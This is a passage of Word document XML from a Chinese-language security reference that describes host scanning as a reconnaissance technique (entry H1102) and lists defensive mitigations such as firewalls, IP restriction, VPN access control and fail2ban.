            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>他们不是万能的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069302E" w:rsidRPr="00A65911" w14:paraId="46DCBFD9" w14:textId="77777777" w:rsidTr="0069302E">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FA68B1E" w14:textId="700AA915" w:rsidR="0069302E" w:rsidRDefault="0069302E" w:rsidP="0069302E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>战略</w:t>
            </w:r>
            <w:r>
              <w:t>作战</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7898" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1333D771" w14:textId="1D111D86" w:rsidR="0069302E" w:rsidRPr="0069302E" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用防火墙来阻止访问不应公开的端口</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制对已知</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址的访问。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将敏感数据和服务器移到网络外围，并使用</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VPN</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或其他访问控制来控制访问。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>速率限制不是预防，只是延迟。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069302E" w:rsidRPr="00A65911" w14:paraId="3D73F379" w14:textId="77777777" w:rsidTr="0069302E">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EF6B20F" w14:textId="657A0BE5" w:rsidR="0069302E" w:rsidRDefault="0069302E" w:rsidP="0069302E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>处置</w:t>
            </w:r>
            <w:r>
              <w:t>相应</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7898" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0919CA56" w14:textId="5C8AE900" w:rsidR="0069302E" w:rsidRPr="0069302E" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>制定处理安全漏洞的计划。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置自动防御，如</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>fail2ban</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，以响应威胁。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>速率限制可以是这里的响应。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="068CA791" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="00A65911" w:rsidRDefault="0069302E" w:rsidP="0069302E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C3F442" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="0069302E" w:rsidRDefault="0069302E" w:rsidP="001A7662"/>
    <w:p w14:paraId="5C1046B4" w14:textId="309C98B2" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扫描</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A7662" w14:paraId="74A662C4" w14:textId="77777777" w:rsidTr="001A7662">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="777553BC" w14:textId="018BDA94" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:t>H1102</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="363CE96A" w14:textId="77777777" w:rsidR="00E261DC" w:rsidRDefault="00E261DC" w:rsidP="00E261DC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t>技术信息收集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B1A4629" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A027E44" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CB2DBC7" w14:textId="236D2744" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>IDS/IPS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E27F49D" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662"/>
    <w:p w14:paraId="4DDFE4CE" w14:textId="77B67C7A" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任何网络侦察任务的最初步骤之一是将一组（有时更多组）</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>范围减少为活跃主机列表。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描每个</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址的每个端口都很慢，这通常是不必要的。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然，使主机活跃的原因在很大程度上取决于扫描目的。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络管理员可能只关心运行某项服务的主机，而安全审核员可能会关心每个具有</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址的设备。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员可能只使用</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ICMP ping</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来定位其内部网络上的主机，而外部渗透测试人员可能会使用多种不同的探针来试图逃避防火墙限制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0A3272" w14:textId="77777777" w:rsidR="0069302E" w:rsidRDefault="0069302E" w:rsidP="0069302E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3E282A" w14:textId="12495417" w:rsidR="0069302E" w:rsidRDefault="0069302E" w:rsidP="0069302E">
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果您想要可靠可应用的服务（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），那么</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将能够找到它。</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般来说，端口扫描不是威胁</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全性不应该依赖于连攻击者都不知道的服务。</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的非标准端口主要用于降低日志噪声，因为很多暴力破解使用默认端口</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D9F9A6" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="0069302E" w:rsidRDefault="0069302E" w:rsidP="0069302E"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1838"/>
        <w:gridCol w:w="7898"/>
      </w:tblGrid>
      <w:tr w:rsidR="0069302E" w:rsidRPr="00567ECD" w14:paraId="7E03DA37" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7197AA8C" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="00567ECD" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7898" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6276AE26" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="00567ECD" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069302E" w:rsidRPr="00A65911" w14:paraId="4C546E25" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74D77E31" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId272" w:history="1">
              <w:r w:rsidR="0069302E">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>知己知彼</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7898" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A1114B7" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="00A65911" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>首先了解您拥有的资产以及攻击者的目标，然后端口扫描自检来知道你的弱点，从而了解端口扫描可以做什么和不能做什么</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>他们不是万能的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069302E" w:rsidRPr="00A65911" w14:paraId="616432F6" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E126E16" w14:textId="77777777" w:rsidR="0069302E" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>战略</w:t>
            </w:r>
            <w:r>
              <w:t>作战</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7898" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04162A5F" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="0069302E" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用防火墙来阻止访问不应公开的端口</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>服务。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制对已知</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址的访问。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将敏感数据和服务器移到网络外围，并使用</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VPN</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或其他访问控制来控制访问。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>速率限制不是预防，只是延迟。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069302E" w:rsidRPr="00A65911" w14:paraId="3E96F02E" w14:textId="77777777" w:rsidTr="00CC5590">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C03E6E6" w14:textId="77777777" w:rsidR="0069302E" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>处置</w:t>
            </w:r>
            <w:r>
              <w:t>相应</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7898" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CBDF619" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="0069302E" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>制定处理安全漏洞的计划。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置自动防御，如</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>fail2ban</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，以响应威胁。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>速率限制可以是这里的响应。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F88D90C" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="00A65911" w:rsidRDefault="0069302E" w:rsidP="0069302E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72625571" w14:textId="30FDC5BE" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扫描</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A7662" w14:paraId="2D6F3F91" w14:textId="77777777" w:rsidTr="001A7662">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4174CCE2" w14:textId="64086C42" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
